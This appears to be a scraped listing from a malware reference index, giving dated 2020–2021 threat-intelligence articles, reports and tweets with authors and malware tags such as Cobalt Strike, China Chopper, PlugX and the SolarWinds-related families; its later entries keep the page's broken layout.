2021-06-01 ⋅ SANS ⋅ Jake Williams, Kevin Haley: A Contrarian View on SolarWinds ⋅ Tags: Cobalt Strike, Raindrop, SUNBURST, TEARDROP
2021-06-01 ⋅ Microsoft ⋅ Microsoft 365 Defender Threat Intelligence Team, Microsoft Threat Intelligence Center (MSTIC): New sophisticated email-based attack from NOBELIUM ⋅ Tags: Cobalt Strike
2021-05-29 ⋅ Twitter (@elisalem9) ⋅ Eli Salem: Tweet on the obfuscation mechanism and extraction procedure of the Cobalt Strike beacon module used by NOBELIUM/UNC2452 ⋅ Tags: Cobalt Strike
2021-05-28 ⋅ CISA ⋅ US-CERT: Malware Analysis Report (AR21-148A): Cobalt Strike Beacon ⋅ Tags: Cobalt Strike
2021-05-28 ⋅ CISA ⋅ US-CERT: Alert (AA21-148A): Sophisticated Spearphishing Campaign Targets Government Organizations, IGOs, and NGOs ⋅ Tags: Cobalt Strike
2021-05-28 ⋅ Microsoft ⋅ Microsoft Threat Intelligence Center (MSTIC): Breaking down NOBELIUM’s latest early-stage toolset ⋅ Tags: BOOMBOX, Cobalt Strike
2021-05-27 ⋅ Volexity ⋅ Damien Cash, Josh Grunzweig, Matthew Meltzer, Sean Koessel, Steven Adair, Thomas Lancaster: Suspected APT29 Operation Launches Election Fraud Themed Phishing Campaigns ⋅ Tags: Cobalt Strike
2021-05-27 ⋅ xorhex blog ⋅ Twitter (@xorhex): Mustang Panda PlugX - Reused Mutex and Folder Found in the Extracted Config ⋅ Tags: PlugX
2021-05-26 ⋅ DeepInstinct ⋅ Ron Ben Yizhak: A Deep Dive into Packing Software CryptOne ⋅ Tags: Cobalt Strike, Dridex, Emotet, Gozi, ISFB, Mailto, QakBot, SmokeLoader, WastedLocker, Zloader
2021-05-25 ⋅ Huntress Labs ⋅ Matthew Brennan: Cobalt Strikes Again: An Analysis of Obfuscated Malware ⋅ Tags: Cobalt Strike
2021-05-21 ⋅ blackarrow ⋅ Pablo Ambite: Leveraging Microsoft Teams to persist and cover up Cobalt Strike traffic ⋅ Tags: Cobalt Strike
2021-05-19 ⋅ Intel 471 ⋅ Intel 471: Look how many cybercriminals love Cobalt Strike ⋅ Tags: BazarBackdoor, Cobalt Strike, Hancitor, QakBot, SmokeLoader, SystemBC, TrickBot
2021-05-19 ⋅ Medium Mehmet Ergene ⋅ Mehmet Ergene: Enterprise Scale Threat Hunting: Network Beacon Detection with Unsupervised ML and KQL — Part 2 ⋅ Tags: Cobalt Strike
2021-05-18 ⋅ Sophos ⋅ Greg Iddon, John Shier, Mat Gangwer, Peter Mackenzie: The Active Adversary Playbook 2021 ⋅ Tags: Cobalt Strike, MimiKatz
2021-05-17 ⋅ Talos ⋅ Brad Garnett: Case Study: Incident Response is a relationship-driven business ⋅ Tags: Cobalt Strike
2021-05-17 ⋅ xorhex blog ⋅ Twitter (@xorhex): Mustang Panda PlugX - 45.251.240.55 Pivot ⋅ Tags: PlugX
2021-05-16 ⋅ NCSC Ireland ⋅ NCSC Ireland: Ransomware Attack on Health Sector - UPDATE 2021-05-16 ⋅ Tags: Cobalt Strike, Conti
2021-05-14 ⋅ GuidePoint Security ⋅ Drew Schmitt: From ZLoader to DarkSide: A Ransomware Story ⋅ Tags: DarkSide, Cobalt Strike, Zloader
2021-05-14 ⋅ Blue Team Blog ⋅ Auth 0r: DarkSide Ransomware Operations – Preventions and Detections. ⋅ Tags: Cobalt Strike, DarkSide
2021-05-13 ⋅ AWAKE ⋅ Kieran Evans: Catching the White Stork in Flight ⋅ Tags: Cobalt Strike, MimiKatz, RMS
2021-05-12 ⋅ Medium Mehmet Ergene ⋅ Mehmet Ergene: Enterprise Scale Threat Hunting: Network Beacon Detection with Unsupervised ML and KQL — Part 1 ⋅ Tags: Cobalt Strike
2021-05-12 ⋅ The DFIR Report: Conti Ransomware ⋅ Tags: Cobalt Strike, Conti, IcedID
2021-05-11 ⋅ Mal-Eats ⋅ mal_eats: Campo, a New Attack Campaign Targeting Japan ⋅ Tags: AnchorDNS, BazarBackdoor, campoloader, Cobalt Strike, Phobos, Snifula, TrickBot, Zloader
2021-05-11 ⋅ FireEye ⋅ Alyssa Rahman, Andrew Moore, Brendan McKeague, Jared Wilson, Jeremy Kennelly, Jordan Nuce, Kimberly Goody: Shining a Light on DARKSIDE Ransomware Operations ⋅ Tags: Cobalt Strike, DarkSide
2021-05-10 ⋅ Mal-Eats ⋅ mal_eats: Overview of Campo, a new attack campaign targeting Japan ⋅ Tags: AnchorDNS, BazarBackdoor, Cobalt Strike, ISFB, Phobos, TrickBot, Zloader
2021-05-10 ⋅ ZERO.BS ⋅ ZEROBS: Cobaltstrike-Beacons analyzed ⋅ Tags: Cobalt Strike
2021-05-07 ⋅ Cisco Talos ⋅ Andrew Windsor, Caitlin Huey, Edmund Brumaghin: Lemon Duck spreads its wings: Actors target Microsoft Exchange servers, incorporate new TTPs ⋅ Tags: CHINACHOPPER, Cobalt Strike, Lemon Duck
2021-05-07 ⋅ Medium svch0st ⋅ svch0st: Stats from Hunting Cobalt Strike Beacons ⋅ Tags: Cobalt Strike
2021-05-07 ⋅ TEAMT5 ⋅ Aragorn Tseng, Charles Li: Mem2Img: Memory-Resident Malware Detection via Convolution Neural Network ⋅ Tags: Cobalt Strike, PlugX, Waterbear
2021-05-07 ⋅ SophosLabs Uncut ⋅ Rajesh Nataraj: New Lemon Duck variants exploiting Microsoft Exchange Server ⋅ Tags: CHINACHOPPER, Cobalt Strike, Lemon Duck
2021-05-06 ⋅ Trend Micro ⋅ Arianne Dela Cruz, Cris Tomboc, Jayson Chong, Nikki Madayag, Sean Torre: Proxylogon: A Coinminer, a Ransomware, and a Botnet Join the Party ⋅ Tags: BlackKingdom Ransomware, CHINACHOPPER, Lemon Duck, Prometei
2021-05-05 ⋅ TRUESEC ⋅ Mattias Wåhlén: Are The Notorious Cyber Criminals Evil Corp actually Russian Spies? ⋅ Tags: Cobalt Strike, Hades, WastedLocker
2021-05-05 ⋅ Symantec ⋅ Threat Hunter Team: Multi-Factor Authentication: Headache for Cyber Actors Inspires New Attack Techniques ⋅ Tags: CHINACHOPPER
2021-05-05 ⋅ SophosLabs Uncut ⋅ Andrew Brandt, Gabor Szappanos, Peter Mackenzie, Vikas Singh: Intervention halts a ProxyLogon-enabled attack ⋅ Tags: Cobalt Strike
2021-05-04 ⋅ Medium sergiusechel ⋅ Sergiu Sechel: Improving the network-based detection of Cobalt Strike C2 servers in the wild while reducing the risk of false positives ⋅ Tags: Cobalt Strike
2021-05-02 ⋅ The DFIR Report ⋅ The DFIR Report: Trickbot Brief: Creds and Beacons ⋅ Tags: Cobalt Strike, TrickBot
2021-04-29 ⋅ FireEye ⋅ Justin Moore, Raymond Leong, Tyler McLellan: UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat ⋅ Tags: Cobalt Strike, FiveHands, HelloKitty
2021-04-29 ⋅ NTT ⋅ Threat Detection NTT Ltd.: The Operations of Winnti group ⋅ Tags: Cobalt Strike, ShadowPad, Spyder, Winnti, Earth Lusca
2021-04-27 ⋅ Trend Micro ⋅ Earle Earnshaw, Janus Agcaoili: Legitimate Tools Weaponized for Ransomware in 2021 ⋅ Tags: Cobalt Strike, MimiKatz
2021-04-27 ⋅ Trend Micro ⋅ Janus Agcaoili: Hello Ransomware Uses Updated China Chopper Web Shell, SharePoint Vulnerability ⋅ Tags: CHINACHOPPER, Cobalt Strike
2021-04-26 ⋅ nviso ⋅ Maxime Thiebaut: Anatomy of Cobalt Strike’s DLL Stager ⋅ Tags: Cobalt Strike
2021-04-26 ⋅ getrevue ⋅ Twitter (@80vul): Hunting Cobalt Strike DNS redirectors by using ZoomEye ⋅ Tags: Cobalt Strike
2021-04-24 ⋅ Non-offensive security ⋅ Non-offensive security team: Detect Cobalt Strike server through DNS protocol ⋅ Tags: Cobalt Strike
2021-04-23 ⋅ Twitter (@vikas891) ⋅ Vikas Singh: Tweet on DOPPEL SPIDER using intensive/multiple injected Cobalt Strike Beacons with varied polling intervals ⋅ Tags: Cobalt Strike, DoppelPaymer
2021-04-22 ⋅ Twitter (@AltShiftPrtScn) ⋅ Peter Mackenzie: Tweet on TTPs seen in IR used by DOPPEL SPIDER ⋅ Tags: Cobalt Strike, DoppelPaymer
2021-04-21 ⋅ SophosLabs Uncut ⋅ Anand Aijan, Andrew Brandt, Markel Picado, Michael Wood, Sean Gallagher, Sivagnanam Gn, Suriya Natarajan: Nearly half of malware now use TLS to conceal communications ⋅ Tags: Agent Tesla, Cobalt Strike, Dridex, SystemBC
2021-04-20 ⋅ Medium walmartglobaltech ⋅ Jason Reaves: CobaltStrike Stager Utilizing Floating Point Math ⋅ Tags: Cobalt Strike
2021-04-19 ⋅ Netresec ⋅ Erik Hjelmvik: Analysing a malware PCAP with IcedID and Cobalt Strike traffic ⋅ Tags: Cobalt Strike, IcedID
2021-04-18 ⋅ YouTube (dist67) ⋅ Didier Stevens: Decoding Cobalt Strike Traffic ⋅ Tags: Cobalt Strike
2021-04-16 ⋅ Trend Micro ⋅ Nitesh Surana: Could the Microsoft Exchange breach be stopped? ⋅ Tags: CHINACHOPPER
2021-04-15 ⋅ Palo Alto Networks Unit 42 ⋅ Robert Falcone: Actor Exploits Microsoft Exchange Server Vulnerabilities, Cortex XDR Blocks Harvesting of Credentials ⋅ Tags: CHINACHOPPER
2021-04-14 ⋅ InfoSec Handlers Diary Blog ⋅ Brad Duncan: April 2021 Forensic Quiz: Answers and Analysis ⋅ Tags: Anchor, BazarBackdoor, Cobalt Strike
2021-04-12 ⋅ Inde ⋅ Chris Campbell: A Different Kind of Zoombomb ⋅ Tags: Cobalt Strike
2021-04-09 ⋅ F-Secure ⋅ Giulio Ginesi, Riccardo Ancarani: Detecting Exposed Cobalt Strike DNS Redirectors ⋅ Tags: Cobalt Strike
2021-04-07 ⋅ Medium sixdub ⋅ Justin Warner: Using Kaitai Struct to Parse Cobalt Strike Beacon Configs ⋅ Tags: Cobalt Strike
2021-04-05 ⋅ Medium walmartglobaltech ⋅ Jason Reaves, Joshua Platt: TrickBot Crews New CobaltStrike Loader ⋅ Tags: Cobalt Strike, TrickBot
2021-04-01 ⋅ DomainTools ⋅ Joe Slowik: COVID-19 Phishing With a Side of Cobalt Strike ⋅ Tags: Cobalt Strike
2021-04-01 ⋅ Palo Alto Networks Unit 42 ⋅ Brad Duncan: Hancitor’s Use of Cobalt Strike and a Noisy Network Ping Tool ⋅ Tags: Cobalt Strike, Hancitor, Moskalvzapoe
2021-03-31 ⋅ Red Canary ⋅ Red Canary: 2021 Threat Detection Report ⋅ Tags: Shlayer, Andromeda, Cobalt Strike, Dridex, Emotet, IcedID, MimiKatz, QakBot, TrickBot
2021-03-30 ⋅ GuidePoint Security ⋅ Drew Schmitt: Yet Another Cobalt Strike Stager: GUID Edition ⋅ Tags: Cobalt Strike
2021-03-29 ⋅ The Record ⋅ Catalin Cimpanu: RedEcho group parks domains after public exposure ⋅ Tags: PlugX, ShadowPad, RedEcho
2021-03-29 ⋅ The DFIR Report ⋅ The DFIR Report: Sodinokibi (aka REvil) Ransomware ⋅ Tags: Cobalt Strike, IcedID, REvil
2021-03-26 ⋅ Imperva ⋅ Daniel Johnston: Imperva Observes Hive of Activity Following Hafnium Microsoft Exchange Disclosures ⋅ Tags: CHINACHOPPER
2021-03-25 ⋅ Microsoft ⋅ Tom McElroy: Web Shell Threat Hunting with Azure Sentinel ⋅ Tags: CHINACHOPPER
2021-03-25 ⋅ Recorded Future ⋅ Insikt Group®: Suspected Chinese Group Calypso APT Exploiting Vulnerable Microsoft Exchange Servers ⋅ Tags: Meterpreter, PlugX
2021-03-25 ⋅ Microsoft ⋅ Microsoft 365 Defender Threat Intelligence Team: Analyzing attacks taking advantage of the Exchange Server vulnerabilities ⋅ Tags: CHINACHOPPER
2021-03-21 ⋅ Twitter (@CyberRaiju) ⋅ Jai Minton: Twitter Thread with analysis of .NET China Chopper ⋅ Tags: CHINACHOPPER
2021-03-21 ⋅ YouTube (dist67) ⋅ Didier Stevens: Finding Metasploit & Cobalt Strike URLs ⋅ Tags: Cobalt Strike
2021-03-21 ⋅ Blackberry ⋅ Blackberry Research: 2021 Threat Report ⋅ Tags: Bashlite, FritzFrog, IPStorm, Mirai, Tsunami, elf.wellmess, AppleJeus, Dacls, EvilQuest, Manuscrypt, Astaroth, BazarBackdoor, Cerber, Cobalt Strike, Emotet, FinFisher RAT, Kwampirs, MimiKatz, NjRAT, Ryuk, SmokeLoader, TrickBot
2021-03-19 ⋅ Bundesamt für Sicherheit in der Informationstechnik ⋅ CERT-Bund: Microsoft Exchange Schwachstellen Detektion und Reaktion (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) ⋅ Tags: CHINACHOPPER, MimiKatz
2021-03-18 ⋅ DeepInstinct ⋅ Ben Gross: Cobalt Strike – Post-Exploitation Attackers Toolkit ⋅ Tags: Cobalt Strike
2021-03-18 ⋅ PRODAFT Threat Intelligence ⋅ PRODAFT: SilverFish Group Threat Actor Report ⋅ Tags: Cobalt Strike, Dridex, Koadic
2021-03-17 ⋅ Recorded Future ⋅ Insikt Group®: China-linked TA428 Continues to Target Russia and Mongolia IT Companies ⋅ Tags: PlugX, Poison Ivy, TA428
2021-03-16 ⋅ Elastic ⋅ Joe Desimone: Detecting Cobalt Strike with memory signatures ⋅ Tags: Cobalt Strike
2021-03-16 ⋅ McAfee ⋅ McAfee ATR: Technical Analysis of Operation Diànxùn ⋅ Tags: Cobalt Strike
2021-03-15 ⋅ Trustwave ⋅ Joshua Deacon: HAFNIUM, China Chopper and ASP.NET Runtime ⋅ Tags: CHINACHOPPER
2021-03-11 ⋅ Cyborg Security ⋅ Josh Campbell: You Don't Know the HAFNIUM of it... ⋅ Tags: CHINACHOPPER, Cobalt Strike, PowerCat
2021-03-11 ⋅ Qurium ⋅ Qurium: Myanmar – Multi-stage malware attack targets elected lawmakers ⋅ Tags: Cobalt Strike
2021-03-11 ⋅ Palo Alto Networks Unit 42 ⋅ Unit 42: Microsoft Exchange Server Attack Timeline ⋅ Tags: CHINACHOPPER
2021-03-11 ⋅ DEVO ⋅ Fran Gomez: Detection and Investigation Using Devo: HAFNIUM 0-day Exploits on Microsoft Exchange Service ⋅ Tags: CHINACHOPPER, MimiKatz
2021-03-10 ⋅ Lemon's InfoSec Ramblings ⋅ Josh Lemon: Microsoft Exchange & the HAFNIUM Threat Actor ⋅ Tags: CHINACHOPPER
2021-03-10 ⋅ PICUS Security ⋅ Süleyman Özarslan: Tactics, Techniques, and Procedures (TTPs) Used by HAFNIUM to Target Microsoft Exchange Servers ⋅ Tags: CHINACHOPPER
2021-03-10 ⋅ ESET Research ⋅ Mathieu Tartare, Matthieu Faou, Thomas Dupuy: Exchange servers under siege from at least 10 APT groups ⋅ Tags: Microcin, MimiKatz, PlugX, Winnti, APT27, APT41, Calypso, Tick, ToddyCat, Tonto Team, Vicious Panda
2021-03-10 ⋅ DomainTools ⋅ Joe Slowik: Examining Exchange Exploitation and its Lessons for Defenders ⋅ Tags: CHINACHOPPER
2021-03-10 ⋅ Proofpoint ⋅ Dennis Schwarz, Matthew Mesa, Proofpoint Threat Research Team: NimzaLoader: TA800’s New Initial Access Malware ⋅ Tags: BazarNimrod, Cobalt Strike
2021-03-09 ⋅ Palo Alto Networks Unit 42 ⋅ Unit 42: Remediation Steps for the Microsoft Exchange Server Vulnerabilities ⋅ Tags: CHINACHOPPER
2021-03-09 ⋅ splunk ⋅ Security Research Team: Cloud Federated Credential Abuse & Cobalt Strike: Threat Research February 2021 ⋅ Tags: Cobalt Strike
2021-03-09 ⋅ Red Canary ⋅ Brian Donohue, Katie Nickels, Tony Lambert: Microsoft Exchange server exploitation: how to detect, mitigate, and stay calm ⋅ Tags: CHINACHOPPER
2021-03-09 ⋅ PRAETORIAN ⋅ Anthony Weems, Dallas Kaman, Michael Weber: Reproducing the Microsoft Exchange Proxylogon Exploit Chain ⋅ Tags: CHINACHOPPER
2021-03-09 ⋅ YouTube (John Hammond) ⋅ John Hammond: HAFNIUM - Post-Exploitation Analysis from Microsoft Exchange ⋅ Tags: CHINACHOPPER
2021-03-08 ⋅ Youtube (SANS Digital Forensics and Incident Response) ⋅ Adam Pennington, Jen Burns, Katie Nickels: STAR Webcast: Making sense of SolarWinds through the lens of MITRE ATT&CK(R) ⋅ Tags: Cobalt Strike, SUNBURST, TEARDROP
2021-03-08 ⋅ Symantec ⋅ Threat Hunter Team: How Symantec Stops Microsoft Exchange Server Attacks ⋅ Tags: CHINACHOPPER, MimiKatz
2021-03-08 ⋅ Palo Alto Networks Unit 42 ⋅ Jeff White: Analyzing Attacks Against Microsoft Exchange Server With China Chopper Webshells ⋅ Tags: CHINACHOPPER
2021-03-08 ⋅ The DFIR Report ⋅ The DFIR Report: Bazar Drops the Anchor ⋅ Tags: Anchor, BazarBackdoor, Cobalt Strike
2021-03-07 ⋅ TRUESEC ⋅ Rasmus Grönlund: Tracking Microsoft Exchange Zero-Day ProxyLogon and HAFNIUM ⋅ Tags: CHINACHOPPER
2021-03-07 ⋅ InfoSec Handlers Diary Blog ⋅ Didier Stevens: PCAPs and Beacons ⋅ Tags: Cobalt Strike
2021-03-05 ⋅ Wired ⋅ Andy Greenberg: Chinese Hacking Spree Hit an ‘Astronomical’ Number of Victims ⋅ Tags: CHINACHOPPER
2021-03-05 ⋅ Huntress Labs ⋅ Huntress Labs: Operation Exchange Marauder ⋅ Tags: CHINACHOPPER
2021-03-04 ⋅ Huntress Labs ⋅ Huntress Labs: Operation Exchange Marauder ⋅ Tags: CHINACHOPPER
2021-03-04 ⋅ FireEye ⋅ Andrew Thompson, Chris DiGiamo, Matt Bromiley, Robert Wallace: Detection and Response to Exploitation of Microsoft Exchange Zero-Day Vulnerabilities ⋅ Tags: CHINACHOPPER, HAFNIUM
2021-03-04 ⋅ CrowdStrike ⋅ The Falcon Complete Team: Falcon Complete Stops Microsoft Exchange Server Zero-Day Exploits ⋅ Tags: CHINACHOPPER, HAFNIUM
2021-03-03 ⋅ Huntress Labs ⋅ John Hammond: Rapid Response: Mass Exploitation of On-Prem Exchange Servers ⋅ Tags: CHINACHOPPER, HAFNIUM
2021-03-03 ⋅ Huntress Labs ⋅ Huntress Labs: Mass exploitation of on-prem Exchange servers :( ⋅ Tags: CHINACHOPPER, HAFNIUM
2021-03-03 ⋅ MITRE ⋅ MITRE ATT&CK: HAFNIUM ⋅ Tags: CHINACHOPPER, HAFNIUM
2021-03-02 ⋅ Twitter (@ESETresearch) ⋅ ESET Research: Tweet on Exchange RCE ⋅ Tags: CHINACHOPPER, HAFNIUM
2021-03-02 ⋅ Volexity ⋅ Josh Grunzweig, Matthew Meltzer, Sean Koessel, Steven Adair, Thomas Lancaster: Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities ⋅ Tags: CHINACHOPPER, HAFNIUM
2021-03-02 ⋅ Rapid7 Labs ⋅ Andrew Christian: Rapid7’s InsightIDR Enables Detection And Response to Microsoft Exchange Zero-Day ⋅ Tags: CHINACHOPPER, HAFNIUM
2021-03-02 ⋅ Microsoft ⋅ Microsoft 365 Defender Threat Intelligence Team, Microsoft 365 Security, Microsoft Threat Intelligence Center (MSTIC): HAFNIUM targeting Exchange Servers with 0-day exploits ⋅ Tags: CHINACHOPPER, HAFNIUM
2021-03-01 ⋅ Medium walmartglobaltech ⋅ Jason Reaves, Joshua Platt: Investigation into the state of Nim malware ⋅ Tags: BazarNimrod, Cobalt Strike
2021-03-01 ⋅ Medium walmartglobaltech ⋅ Jason Reaves, Joshua Platt: Nimar Loader ⋅ Tags: BazarBackdoor, BazarNimrod, Cobalt Strike
2021-02-28 ⋅ Recorded Future ⋅ Insikt Group®: China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions ⋅ Tags: Icefog, PlugX, ShadowPad
2021-02-28 ⋅ PWC UK ⋅ PWC UK: Cyber Threats 2020: A Year in Retrospect ⋅ Tags: elf.wellmess, FlowerPower, PowGoop, 8.t Dropper, Agent.BTZ, Agent Tesla, Appleseed, Ave Maria, Bankshot, BazarBackdoor, BLINDINGCAN, Chinoxy, Conti, Cotx RAT, Crimson RAT, DUSTMAN, Emotet, FriedEx, FunnyDream, Hakbit, Mailto, Maze, METALJACK, Nefilim, Oblique RAT, Pay2Key, PlugX, QakBot, REvil, Ryuk, StoneDrill, StrongPity, SUNBURST, SUPERNOVA, TrickBot, TurlaRPC, Turla SilentMoon, WastedLocker, WellMess, Winnti, ZeroCleare, APT10, APT23, APT27, APT31, APT41, BlackTech, BRONZE EDGEWOOD, Inception Framework, MUSTANG PANDA, Red Charon, Red Nue, Sea Turtle
Tonto Team
×Select Content2021-02-28
⋅
Recorded Future
⋅
Insikt Group®China-linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions PlugX
ShadowPad
RedEcho
×Select Content2021-02-26
⋅
CrowdStrike
⋅
Eric Loui,
Sergei FrankoffHypervisor Jackpotting: CARBON SPIDER and SPRITE SPIDER Target ESXi Servers With Ransomware to Maximize Impact DarkSide
RansomEXX
Griffon
Carbanak
Cobalt Strike
DarkSide
IcedID
MimiKatz
PyXie
RansomEXX
REvil
×Select Content2021-02-25
⋅
FireEye
⋅
Brendan McKeague,
Bryce Abdo,
Van TaSo Unchill: Melting UNC2198 ICEDID to Ransomware Operations MOUSEISLAND
Cobalt Strike
Egregor
IcedID
Maze
SystemBC
×Select Content2021-02-24
⋅
Github (AmnestyTech)
⋅
Amnesty InternationalOverview of Ocean Lotus Samples used to target Vietnamese Human Rights Defenders OceanLotus
Cobalt Strike
KerrDown
×Select Content2021-02-24
⋅
⋅
VMWare Carbon Black
⋅
Takahiro HaruyamaKnock, knock, Neo. - Active C2 Discovery Using Protocol Emulation Cobalt Strike
×Select Content2021-02-23
⋅
CrowdStrike
⋅
CrowdStrike2021 Global Threat Report RansomEXX
Amadey
Anchor
Avaddon
BazarBackdoor
Clop
Cobalt Strike
Conti
Cutwail
DanaBot
DarkSide
DoppelPaymer
Dridex
Egregor
Emotet
Hakbit
IcedID
JSOutProx
KerrDown
LockBit
Mailto
Maze
MedusaLocker
Mespinoza
Mount Locker
NedDnLoader
Nemty
Pay2Key
PlugX
Pushdo
PwndLocker
PyXie
QakBot
Quasar RAT
RagnarLocker
Ragnarok
RansomEXX
REvil
Ryuk
Sekhmet
ShadowPad
SmokeLoader
Snake
SUNBURST
SunCrypt
TEARDROP
TrickBot
WastedLocker
Winnti
Zloader
Evilnum
OUTLAW SPIDER
RIDDLE SPIDER
SOLAR SPIDER
VIKING SPIDER
×Select Content2021-02-11
⋅
Twitter (@TheDFIRReport)
⋅
The DFIR ReportTweet on Hancitor Activity followed by cobaltsrike beacon Cobalt Strike
Hancitor
×Select Content2021-02-09
⋅
Securehat
⋅
SecurehatExtracting the Cobalt Strike Config from a TEARDROP Loader Cobalt Strike
TEARDROP
×Select Content2021-02-09
⋅
Cobalt Strike
⋅
Raphael MudgeLearn Pipe Fitting for all of your Offense Projects Cobalt Strike
×Select Content2021-02-03
⋅
InfoSec Handlers Diary Blog
⋅
Brad DuncanExcel spreadsheets push SystemBC malware Cobalt Strike
SystemBC
×Select Content2021-02-02
⋅
Twitter (@TheDFIRReport)
⋅
The DFIR ReportTweet on recent dridex post infection activity Cobalt Strike
Dridex
×Select Content2021-02-02
⋅
⋅
CRONUP
⋅
Germán FernándezDe ataque con Malware a incidente de Ransomware Avaddon
BazarBackdoor
Buer
Clop
Cobalt Strike
Conti
DanaBot
Dharma
Dridex
Egregor
Emotet
Empire Downloader
FriedEx
GootKit
IcedID
MegaCortex
Nemty
Phorpiex
PwndLocker
PyXie
QakBot
RansomEXX
REvil
Ryuk
SDBbot
SmokeLoader
TrickBot
Zloader
×Select Content2021-02-02
⋅
Committee to Protect Journalists
⋅
Madeline EarpHow Vietnam-based hacking operation OceanLotus targets journalists Cobalt Strike
×Select Content2021-02-01
⋅
pkb1s.github.io
⋅
Petros KoutroumpisRelay Attacks via Cobalt Strike Beacons Cobalt Strike
×Select Content2021-02-01
⋅
AhnLab
⋅
ASEC Analysis TeamBlueCrab ransomware, CobaltStrike hacking tool installed in corporate environment Cobalt Strike
REvil
×Select Content2021-01-31
⋅
The DFIR Report
⋅
The DFIR ReportBazar, No Ryuk? BazarBackdoor
Cobalt Strike
Ryuk
×Select Content2021-01-29
⋅
Trend Micro
⋅
Trend MicroChopper ASPX web shell used in targeted attack CHINACHOPPER
MimiKatz
×Select Content2021-01-28
⋅
⋅
AhnLab
⋅
ASEC Analysis TeamBlueCrab ransomware constantly trying to bypass detection Cobalt Strike
REvil
×Select Content2021-01-28
⋅
TrustedSec
⋅
Adam ChesterTailoring Cobalt Strike on Target Cobalt Strike
×Select Content2021-01-26
⋅
Twitter (@swisscom_csirt)
⋅
Swisscom CSIRTTweet on Cring Ransomware groups using customized Mimikatz sample followed by CobaltStrike and dropping Cring rasomware Cobalt Strike
Cring
MimiKatz
×Select Content2021-01-20
⋅
Microsoft
⋅
Microsoft 365 Defender Research Team,
Microsoft Cyber Defense Operations Center (CDOC),
Microsoft Threat Intelligence Center (MSTIC)Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop Cobalt Strike
SUNBURST
TEARDROP
×Select Content2021-01-20
⋅
Trend Micro
⋅
Abraham Camba,
Gilbert Sison,
Ryan MaglaqueXDR investigation uncovers PlugX, unique technique in APT attack PlugX
×Select Content2021-01-18
⋅
Symantec
⋅
Threat Hunter TeamRaindrop: New Malware Discovered in SolarWinds Investigation Cobalt Strike
Raindrop
SUNBURST
TEARDROP
×Select Content2021-01-17
⋅
Twitter (@AltShiftPrtScn)
⋅
Peter MackenzieTweet on Conti Ransomware group exploiting FortiGate VPNs to drop in CobaltStrike loaders Cobalt Strike
Conti
×Select Content2021-01-15
⋅
Swisscom
⋅
Markus NeisCracking a Soft Cell is Harder Than You Think Ghost RAT
MimiKatz
PlugX
Poison Ivy
Trochilus RAT
×Select Content2021-01-15
⋅
The Hacker News
⋅
Ravie LakshmamanResearchers Disclose Undocumented Chinese Malware Used in Recent Attacks CROSSWALK
×Select Content2021-01-15
⋅
Medium Dansec
⋅
Dan LussierDetecting Malicious C2 Activity -SpawnAs & SMB Lateral Movement in CobaltStrike Cobalt Strike
×Select Content2021-01-14
⋅
PTSecurity
⋅
PT ESC Threat IntelligenceHigaisa or Winnti? APT41 backdoors, old and new Cobalt Strike
CROSSWALK
FunnySwitch
PlugX
ShadowPad
×Select Content2021-01-12
⋅
BrightTALK (FireEye)
⋅
Ben Read,
John HultquistUNC2452: What We Know So Far Cobalt Strike
SUNBURST
TEARDROP
×Select Content2021-01-12
⋅
Fox-IT
⋅
Wouter JansenAbusing cloud services to fly under the radar Cobalt Strike
×Select Content2021-01-11
⋅
SolarWinds
⋅
Sudhakar RamakrishnaNew Findings From Our Investigation of SUNBURST Cobalt Strike
SUNBURST
TEARDROP
×Select Content2021-01-11
⋅
The DFIR Report
⋅
The DFIR ReportTrickbot Still Alive and Well Cobalt Strike
TrickBot
×Select Content2021-01-10
⋅
Medium walmartglobaltech
⋅
Jason ReavesMAN1, Moskal, Hancitor and a side of Ransomware Cobalt Strike
Hancitor
SendSafe
VegaLocker
Moskalvzapoe
×Select Content2021-01-09
⋅
Marco Ramilli's Blog
⋅
Marco RamilliCommand and Control Traffic Patterns ostap
LaZagne
Agent Tesla
Azorult
Buer
Cobalt Strike
DanaBot
DarkComet
Dridex
Emotet
Formbook
IcedID
ISFB
NetWire RC
PlugX
Quasar RAT
SmokeLoader
TrickBot
×Select Content2021-01-09
⋅
Connor McGarr's Blog
⋅
Connor McGarrMalware Development: Leveraging Beacon Object Files for Remote Process Injection via Thread Hijacking Cobalt Strike
×Select Content2021-01-07
⋅
Recorded Future
⋅
Insikt Group®Aversary Infrastructure Report 2020: A Defender's View Octopus
pupy
Cobalt Strike
Empire Downloader
Meterpreter
PoshC2
×Select Content2021-01-06
⋅
Red Canary
⋅
Tony LambertHunting for GetSystem in offensive security tools Cobalt Strike
Empire Downloader
Meterpreter
PoshC2
×Select Content2021-01-05
⋅
Trend Micro
⋅
Trend Micro ResearchEarth Wendigo Injects JavaScript Backdoor to Service Worker for Mailbox Exfiltration Cobalt Strike
Earth Wendigo
×Select Content2021-01-04
⋅
Bleeping Computer
⋅
Ionut IlascuChina's APT hackers move to ransomware attacks Clambling
PlugX
×Select Content2021-01-04
⋅
Medium haggis-m
⋅
Michael HaagMalleable C2 Profiles and You Cobalt Strike
×Select Content2021-01-01
⋅
AWAKE
⋅
Awake SecurityBreaking the Ice: Detecting IcedID and Cobalt Strike Beacon with Network Detection and Response (NDR) Cobalt Strike
IcedID
PhotoLoader
×Select Content2021-01-01
⋅
DomainTools
⋅
Joe SlowikConceptualizing a Continuum of Cyber Threat Attribution CHINACHOPPER
SUNBURST
×Select Content2021-01-01
⋅
Secureworks
⋅
SecureWorksThreat Profile: GOLD WATERFALL Cobalt Strike
DarkSide
GOLD WATERFALL
×Select Content2021-01-01
⋅
Mandiant
⋅
MandiantM-TRENDS 2021 Cobalt Strike
SUNBURST
×Select Content2021-01-01
⋅
⋅
Github (WBGlIl)
⋅
WBGlIlA book on cobaltstrike Cobalt Strike
×Select Content2021-01-01
⋅
Symantec
⋅
Symantec Threat Hunter TeamSupply Chain Attacks:Cyber Criminals Target the Weakest Link Cobalt Strike
Raindrop
SUNBURST
TEARDROP
×Select Content2021-01-01
⋅
Secureworks
⋅
SecureWorksThreat Profile: GOLD WINTER Cobalt Strike
Hades
Meterpreter
GOLD WINTER
×Select Content2021-01-01
⋅
Talos
⋅
Talos Incident ResponseEvicting Maze Cobalt Strike
Maze
×Select Content2021-01-01
